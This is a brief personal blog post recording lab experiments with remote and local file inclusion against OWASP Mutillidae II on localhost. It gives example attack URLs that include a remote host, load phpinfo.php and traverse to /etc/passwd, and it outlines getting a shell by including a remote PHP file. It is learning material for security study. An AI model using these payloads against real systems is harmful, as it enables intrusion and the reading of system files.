About this blog

I'm a developer with over 10 years experience who wants to transition to infosec. This blog is an informal record of my experiments with OWASP's Mutillidae II, a web application exhibiting a multitude of deliberate vulnerabilities. I will also take Offensive Security's PWK training course and get the OSCP certificate

Wednesday, 31 August 2016

RFI and LFI with directory traversal


The 'Styling with Mutillidae' page has an iframe in it, with the iframe src being set by a parameter.

http://localhost/mutillidae/index.php?page=styling-frame.php&page-to-frame=styling.php%3Fpage-title%3DStyling+with+Mutillidae

RFI works:  http://localhost/mutillidae/index.php?page=styling-frame.php&page-to-frame=http://foo.com


I tried to find a URL on the net with a .php extension that was a text/plain mimetype (so I could see my server run the remote code), but failed.  I think that is how one would get a shell on a box using RFI though - include a remote .php with the shellcode in it.

LFI obviously works: http://localhost/mutillidae/index.php?page=styling-frame.php&page-to-frame=phpinfo.php  


Directory traversal LFI also works on the page param: http://localhost/mutillidae/index.php?page=/etc/passwd&page-to-frame=phpinfo.php


Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)